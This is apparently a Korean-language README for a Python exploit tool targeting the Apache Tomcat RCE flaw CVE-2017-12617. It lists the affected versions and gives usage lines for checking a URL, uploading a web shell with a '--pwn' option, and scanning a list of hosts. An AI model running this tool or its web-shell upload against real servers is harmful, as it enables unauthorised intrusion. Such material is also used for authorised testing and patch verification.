
Apache Tomcat에서 발견된 CVE-2017-12617 치명적인 원격 코드 실행(RCE) 취약점
HTTP PUT이 활성화된 시스템(Default 서블릿의 "read-only" 초기화 매개변수를 "false"로 설정)이 영향을 받습니다.
Tomcat 9.0.1(Beta), 8.5.23, 8.0.47 및 7.0.82 이전 버전에는 잠재적으로 위험한
원격 코드 실행(RCE) 취약점이 있으며, 모든 운영 체제에서 기본 서블릿이
readonly 매개변수를 false로 설정하여 구성되거나 WebDAV 서블릿이 활성화된 경우
readonly 매개변수가 false로 설정된 경우
./cve-2017-12617.py [options]
옵션:
-u ,--url [::] 대상 URL이 취약한지 확인
-p,--pwn [::] 웹셸 생성 및 업로드
-l,--list [::] 호스트 목록
[+]사용법:
./cve-2017-12617.py -u http://127.0.0.1
./cve-2017-12617.py --url http://127.0.0.1
./cve-2017-12617.py -u http://127.0.0.1 -p pwn
./cve-2017-12617.py --url http://127.0.0.1 -pwn pwn
./cve-2017-12617.py -l hotsts.txt
./cve-2017-12617.py --list hosts.txt